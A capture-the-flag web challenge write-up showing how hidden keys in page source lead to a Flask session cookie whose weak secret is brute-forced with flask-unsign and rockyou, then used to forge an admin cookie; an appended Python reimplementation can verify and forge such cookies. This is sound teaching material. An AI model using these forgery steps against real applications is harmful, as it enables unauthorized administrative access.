Chocolates

Category

Web

Description

The first thing I want to give everyone is chocolate, of course. I found this wonderful company that sells the most exquisite chocolates, but I heard that they sell a super special secret valentine chocolate that’s hidden somewhere on their website. Here’s the website, do you think you can find it for me?

Solution

Entering the challenge page, we see a page for some chocolate store.

[Screenshot: Taylor’s Chocolates store page]

On the web page we can’t find anything interesting, so let’s check out the HTML.

In the navigation section of the page there’s a commented link.

<div class="head" style="text-align: center;">
    <!--<a class="head-cont nav-link" href="/hidden-page">Hidden Page</a> | -->
    <a class="head-cont nav-link" href="#milk-chocolates">Milk Chocolates</a> | 
    <a class="head-cont nav-link" href="#dark-chocolates">Dark Chocolates</a> |
    <a class="head-cont nav-link" href="#white-chocolates">White Chocolates</a> | 
    <a class="head-cont nav-link" href="#specialty-chocolates">Specialty Chocolates</a>
</div>

Going to /hidden-page we get a message that we need a key.

[Screenshot: "You need a key!" message]

Let’s take a look at the sources again to see if we can find the key.

After checking the sources, we find a key in the /static/style.css file.

@import url('https://fonts.googleapis.com/css?family=Roboto:400,500,700,300');
@import url('https://fonts.googleapis.com/css2?family=Dancing+Script&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap');

/* TEMP - here's a key in case i forget it: "?key=thedarkestchocolate" */

Using this key on the /hidden-page, we get a new page that asks us to verify that we are admin.

[Screenshot: Cindy’s Chocolates page]

Clicking the verify link, we get an image of an Among Us impostor and a new address, /admin-check?key=anotherkeylol.

[Image: Among Us impostor]

Checking the cookies, we find a Flask session cookie, and decoding its contents we can see that it carries an admin flag.

flask-unsign -d -c eyJhZG1pbiI6ImZhbHNlIiwidmlzaXRfdGltZSI6IjIwMjMtMDItMDEgMTk6NDA6MTcuMzIzNTQ2In0.Y9rAdw.X0Na0C2qE9jjX0ZyN6c75Lj89Kc
{'admin': 'false', 'visit_time': '2023-02-01 19:40:17.323546'}

So we need to forge the session cookie. Let’s try to brute-force the secret key with rockyou.

flask-unsign -u -c eyJhZG1pbiI6ImZhbHNlIiwidmlzaXRfdGltZSI6IjIwMjMtMDItMDEgMTk6NDA6MTcuMzIzNTQ2In0.Y9rAdw.X0Na0C2qE9jjX0ZyN6c75Lj89Kc --wordlist ~/wordlists/rockyou.txt --no-literal-eval
[*] Session decodes to: {'admin': 'false', 'visit_time': '2023-02-01 19:40:17.323546'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 11520 attempts
b'BATMAN'

Now that we have the secret key used to sign the session cookie, all we have to do is change the admin value to true and sign the cookie.

flask-unsign -s -S BATMAN -c "{'admin': 'true', 'visit_time': '2023-02-01 19:40:17.323546'}"
eyJhZG1pbiI6InRydWUiLCJ2aXNpdF90aW1lIjoiMjAyMy0wMi0wMSAxOTo0MDoxNy4zMjM1NDYifQ.Y9rBVQ.S58maENtJ9A68hJNqbODN0SpOd8

Using the forged cookie to visit /admin-check?key=anotherkeylol, we get the flag.

[Screenshot: the flag]
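As an added example (not part of the original writeup, and not flask-unsign's code), the following Python reimplements the Flask/itsdangerous session-cookie scheme that the tool above relies on, using only the standard library, so the two weaknesses exploited here are visible: the cookie is signed but not encrypted, so its contents are readable without any key, and a secret key that is a dictionary word lets anyone who guesses it produce a valid signature. The captured cookie and the key BATMAN are taken from the writeup; the strong-key round trip is constructed.

```python
# Added example: Flask's session-cookie scheme (itsdangerous URLSafeTimedSerializer,
# salt "cookie-session", HMAC-SHA1, "hmac" key derivation) in the standard library only.
import base64, hashlib, hmac, json, secrets, time, zlib

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous

def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))

def _signature(secret: bytes, signed_part: bytes) -> bytes:
    key = hmac.new(secret, SALT, hashlib.sha1).digest()  # "hmac" key derivation
    return _b64e(hmac.new(key, signed_part, hashlib.sha1).digest())

def decode_payload(cookie: str) -> dict:
    """Contents are just base64(JSON): anyone can read them, no key needed."""
    payload, _ts, _sig = cookie.encode().rsplit(b".", 2)
    if payload.startswith(b"."):  # zlib-compressed payloads carry a "." prefix
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))

def verify(cookie: str, secret: str):
    """Return the session dict if `secret` signed this cookie, otherwise None."""
    payload, ts, sig = cookie.encode().rsplit(b".", 2)
    if not hmac.compare_digest(_signature(secret.encode(), payload + b"." + ts), sig):
        return None
    return decode_payload(cookie)

def sign(session: dict, secret: str, timestamp=None) -> str:
    """Build a cookie as Flask does: compact key-sorted JSON, timestamp, MAC."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    payload = b"." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    signed_part = payload + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return (signed_part + b"." + _signature(secret.encode(), signed_part)).decode()

# The cookie captured in the writeup; the app signed it with the dictionary word BATMAN.
COOKIE = ("eyJhZG1pbiI6ImZhbHNlIiwidmlzaXRfdGltZSI6IjIwMjMtMDItMDEgMTk6NDA6MTcuMzIzNTQ2In0"
          ".Y9rAdw.X0Na0C2qE9jjX0ZyN6c75Lj89Kc")

def strong_key_round_trip() -> bool:
    # The fix: a random SECRET_KEY (here 256 bits) still round-trips but is not guessable.
    key = secrets.token_hex(32)
    return verify(sign({"admin": False}, key), key) == {"admin": False}

if __name__ == "__main__":
    print(decode_payload(COOKIE), verify(COOKIE, "BATMAN"), verify(COOKIE, "robin"))
```

Because the session is readable by the client, it should never hold secrets, and a SECRET_KEY drawn from a wordlist turns the integrity check into a formality.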

By n00bz, 2023-02-15